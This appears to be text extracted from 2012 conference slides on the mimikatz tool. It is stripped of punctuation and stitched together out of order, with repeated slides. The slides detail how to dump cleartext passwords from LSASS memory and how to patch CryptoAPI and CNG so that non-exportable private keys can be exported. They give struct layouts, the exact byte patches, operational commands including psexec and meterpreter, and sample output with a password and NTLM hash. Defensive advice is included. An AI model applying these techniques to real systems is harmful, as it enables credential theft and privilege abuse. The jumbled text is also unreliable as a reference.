ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
